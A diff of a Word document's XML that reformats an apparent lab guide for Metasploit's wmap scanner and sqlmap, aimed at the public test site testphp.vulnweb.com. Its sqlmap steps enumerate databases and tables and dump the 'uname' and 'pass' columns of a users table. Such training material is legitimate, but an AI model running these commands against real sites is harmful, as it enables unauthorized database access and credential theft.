-      <w:r>
-        <w:t>step</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>service</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>postgresql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> start</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>step</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 3 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>msfdb init</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>step 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>service postgresql start</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">step 3 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>step</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">step 4 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t>db_status</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>step</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>load</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>step</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 6</w:t>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>step 5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>load wmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>step 6</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -140,37 +88,17 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_sites</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">a  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://vulweb.com" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://vulweb.com</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Wmap_sites –a  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId4" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://vulweb.com</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p/>
     <w:p>
@@ -179,13 +107,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_sites</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –l</w:t>
+      <w:r>
+        <w:t>Wmap_sites –l</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -196,11 +119,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Wmap_target</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -208,36 +129,11 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_targets</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">t  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://ip" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://ip</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
+      <w:r>
+        <w:t xml:space="preserve">Wmap_targets –t  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>http://&lt;ipAddress&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -247,13 +143,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_targets</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –l</w:t>
+      <w:r>
+        <w:t>Wmap_targets –l</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -263,13 +154,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> _run</w:t>
+      <w:r>
+        <w:t>Wmap _run</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -279,13 +165,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –t</w:t>
+      <w:r>
+        <w:t>Wmap_run –t</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -294,27 +175,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Info  auxiliary</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>scannerhttp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>http_version</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>Info  auxiliary/scannerhttp/http_version</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -322,13 +185,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wmap_run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –e</w:t>
+      <w:r>
+        <w:t>Wmap_run –e</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -344,7 +202,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId4" w:history="1">
+      <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -377,7 +235,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -413,13 +271,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -430,13 +284,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -448,326 +297,10 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText>http://testphp.vulnweb.com/artists.php?artist=1</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dbs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Step </w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText>http://testphp.vulnweb.com/artists.php?artist=1</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> --tables</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Step </w:t>
-      </w:r>
-      <w:r>
-        <w:t>5</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText>http://testphp.vulnweb.com/artists.php?artist=1</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> --tables</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Step </w:t>
-      </w:r>
-      <w:r>
-        <w:t>6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText>http://testphp.vulnweb.com/artists.php?artist=1</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –T users --columns</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Step </w:t>
-      </w:r>
-      <w:r>
-        <w:t>7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText>http://testphp.vulnweb.com/artists.php?artist=1</w:instrText>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve">" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-        <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –T users  -C </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>uname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –dump</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Step </w:t>
-      </w:r>
-      <w:r>
-        <w:t>10</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">u  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:hyperlink r:id="rId6" w:history="1">
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -776,15 +309,138 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve">  -D </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>acuart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –T users  -C pass –dump</w:t>
+        <w:t xml:space="preserve">  --dbs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  -D acuart --tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  -D acuart --tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  -D acuart –T users --columns</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  -D acuart –T users  -C uname –dump</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Step </w:t>
+      </w:r>
+      <w:r>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sqlmap –u  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  -D acuart –T users  -C pass –dump</w:t>
       </w:r>
     </w:p>
     <w:p/>
